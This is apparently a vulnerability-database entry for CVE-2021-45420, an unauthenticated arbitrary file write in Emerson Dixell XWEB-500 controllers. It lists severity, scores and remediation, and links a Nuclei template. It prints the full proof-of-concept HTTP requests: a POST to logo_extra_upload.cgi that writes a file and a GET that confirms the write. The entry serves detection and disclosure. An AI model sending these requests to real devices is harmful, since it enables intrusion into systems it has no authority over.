| Title | Emerson Dixell XWEB-500 - Arbitrary File Write |
|---|---|
| Author | hackerarpan |
| Severity | Critical |
| Impact | Unauthenticated attackers can write arbitrary files to any location on the Dixell XWEB-500 server, potentially uploading malicious CGI scripts or modifying system files. |
| Remediation | Apply firmware updates provided by Emerson Dixell or restrict network access to the device. |
| CVSS Score | 9.8 |
| EPSS Score | 0.81099 |
| CVE ID | CVE-2021-45420 |
| CWE ID | CWE-200 |
| Tags | cve cve2021 lfw iot dixell xweb500 edb fileupload intrusive vkev vuln |
Emerson Dixell XWEB-500 contains an arbitrary file write caused by unauthenticated access to /cgi-bin/logo_extra_upload.cgi, /cgi-bin/cal_save.cgi, and /cgi-bin/lo_utils.cgi, letting attackers write any file on the system, exploit requires no authentication.
POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Connection: close
Content-Length: 57
Content-Type: application/octet-stream
Accept-Encoding: gzip
38FOwmZOEnRV7HveEJae7b8La8a.txt
dixell-xweb500-filewrite
GET /logo/38FOwmZOEnRV7HveEJae7b8La8a.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.5
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-45420.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-45420.pcap
N/AN/A